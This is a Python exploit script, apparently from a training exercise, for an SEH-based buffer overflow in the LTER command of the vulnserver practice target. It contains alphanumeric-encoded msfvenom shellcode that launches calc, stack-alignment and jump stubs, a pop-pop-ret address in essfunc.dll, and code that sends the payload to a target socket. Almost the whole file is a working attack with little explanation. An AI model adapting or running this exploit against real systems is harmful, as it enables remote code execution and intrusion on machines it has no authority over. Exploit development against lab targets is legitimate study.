/
lter_seh.py
91 lines (85 loc) · 4.76 KB
/
lter_seh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#!/usr/bin/python3
import struct
import subprocess
import socket
target_ip = "X.X.X.X"
target_port = 9999
def make_string(offset):
# Prepend to run LTER command and crash on vulnserver
prepend = b"LTER /.:/"
#cmd = "/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l %d" %offset
#pattern = subprocess.check_output(cmd, shell=True)
#NSEH offset is 3495 for Windows XP SP3, change to 3491 for Windows 2k3, change to 3515 for Windows Vista
#SEH offset is 3499 for Windows XP SP 3, change to 3495 for Windows 2k3, change to 3519 for Windows Vista
# pad out the initial buffer because I was too lazy to calculate the exact bytes
pad = b"\x41"*8 # Change this to 16 for Windows 2k3
# moves the stack to the location our buffer will be at, properly aligned
buf_prepend = b"\x54\x58\x2D\x7F\x07\x52\x51\x2D\x20\x01\x5E\x5E\x2D\x0D\x01\x50\x50\x50\x5C"
# msfvenom -p windows/exec CMD="calc" -f python EXITFUNC=seh BufferRegister=ESP -e x86/alpha_mixed
buf = b""
buf += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += b"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += b"\x69\x6c\x69\x78\x6c\x42\x57\x70\x57\x70\x63\x30\x65"
buf += b"\x30\x4b\x39\x4a\x45\x44\x71\x49\x50\x42\x44\x6e\x6b"
buf += b"\x70\x50\x50\x30\x6e\x6b\x36\x32\x56\x6c\x4e\x6b\x76"
buf += b"\x32\x42\x34\x4e\x6b\x71\x62\x54\x68\x46\x6f\x4d\x67"
buf += b"\x73\x7a\x74\x66\x75\x61\x59\x6f\x6e\x4c\x67\x4c\x75"
buf += b"\x31\x43\x4c\x34\x42\x56\x4c\x37\x50\x4f\x31\x6a\x6f"
buf += b"\x34\x4d\x57\x71\x49\x57\x49\x72\x58\x72\x72\x72\x50"
buf += b"\x57\x4e\x6b\x43\x62\x36\x70\x4e\x6b\x72\x6a\x75\x6c"
buf += b"\x4c\x4b\x72\x6c\x37\x61\x43\x48\x39\x73\x42\x68\x66"
buf += b"\x61\x6e\x31\x70\x51\x4e\x6b\x52\x79\x45\x70\x37\x71"
buf += b"\x6e\x33\x6c\x4b\x77\x39\x55\x48\x68\x63\x57\x4a\x52"
buf += b"\x69\x6e\x6b\x56\x54\x6e\x6b\x55\x51\x4e\x36\x44\x71"
buf += b"\x6b\x4f\x4c\x6c\x6f\x31\x48\x4f\x36\x6d\x53\x31\x59"
buf += b"\x57\x56\x58\x49\x70\x64\x35\x58\x76\x34\x43\x61\x6d"
buf += b"\x39\x68\x67\x4b\x71\x6d\x35\x74\x62\x55\x4a\x44\x61"
buf += b"\x48\x4c\x4b\x52\x78\x34\x64\x65\x51\x4a\x73\x63\x56"
buf += b"\x4e\x6b\x56\x6c\x50\x4b\x4e\x6b\x50\x58\x65\x4c\x67"
buf += b"\x71\x69\x43\x6e\x6b\x76\x64\x4c\x4b\x33\x31\x58\x50"
buf += b"\x4e\x69\x51\x54\x56\x44\x55\x74\x63\x6b\x31\x4b\x63"
buf += b"\x51\x30\x59\x43\x6a\x33\x61\x59\x6f\x49\x70\x71\x4f"
buf += b"\x63\x6f\x51\x4a\x4e\x6b\x72\x32\x48\x6b\x6e\x6d\x53"
buf += b"\x6d\x71\x7a\x66\x61\x4c\x4d\x4b\x35\x38\x32\x53\x30"
buf += b"\x47\x70\x45\x50\x76\x30\x33\x58\x65\x61\x6e\x6b\x62"
buf += b"\x4f\x4c\x47\x6b\x4f\x4b\x65\x6d\x6b\x59\x6e\x76\x6e"
buf += b"\x75\x62\x39\x7a\x42\x48\x79\x36\x4e\x75\x6d\x6d\x4d"
buf += b"\x4d\x39\x6f\x39\x45\x45\x6c\x47\x76\x71\x6c\x34\x4a"
buf += b"\x4b\x30\x49\x6b\x49\x70\x42\x55\x55\x55\x6f\x4b\x31"
buf += b"\x57\x42\x33\x44\x32\x70\x6f\x43\x5a\x67\x70\x61\x43"
buf += b"\x39\x6f\x78\x55\x65\x33\x71\x71\x52\x4c\x50\x63\x73"
buf += b"\x30\x41\x41"
# padding between the stack adjustment/alignment and the shellcode
pad2 = b"\x41" * (1000 - len(buf_prepend) - 1)
# combine that all into one variable and make it easier to deal with
stage = pad + buf_prepend + pad2 + buf
# actually a near jump, jumps back to the beginning of our buffer
long_jump = b"\x54\x58\x2D\x70\x7F\x7F\x7F\x2D\x04\x60\x7F\x7F"
long_jump += b"\x2D\x04\x0F\x01\x01\x50\x5C\x25\x4A\x4D\x4E\x55"
long_jump += b"\x25\x35\x32\x31\x2A\x2D\x7F\x08\x52\x51\x2D\x0F"
long_jump += b"\x02\x5E\x5E\x2D\x0E\x03\x50\x50\x50\x25\x4A\x4D"
long_jump += b"\x4E\x55\x25\x35\x32\x31\x2A\x2D\x7F\x7F\x7F\x10"
long_jump += b"\x2D\x20\x30\x30\x03\x2D\x20\x0F\x0F\x03\x50"
# jumps back to take our jump to the beginning of shellcode
nseh = b"\x42\x77\xff\x42"
# pop pop ret located in essfunc.dll
seh = struct.pack("<I", 0x6250120b)
# combine it all with plenty of space for our alpha encoded jump to the beginning of the buffer
junk = stage + b"\x41"*(offset - 125 - len(stage)) + long_jump + b"\x41" * (125 - len(long_jump))
afterjunk = b"D"*100
attack_string = prepend + junk + nseh + seh + afterjunk
return attack_string
def exploit(crash_string):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
response = s.recv(2048)
print(response.decode())
s.send(crash_string)
def main():
offset = 3495 # change to 3491 for Windows 2k3, change to 3515 for Windows Vista
crash_string = make_string(offset)
exploit(crash_string)
if __name__ == '__main__':
main()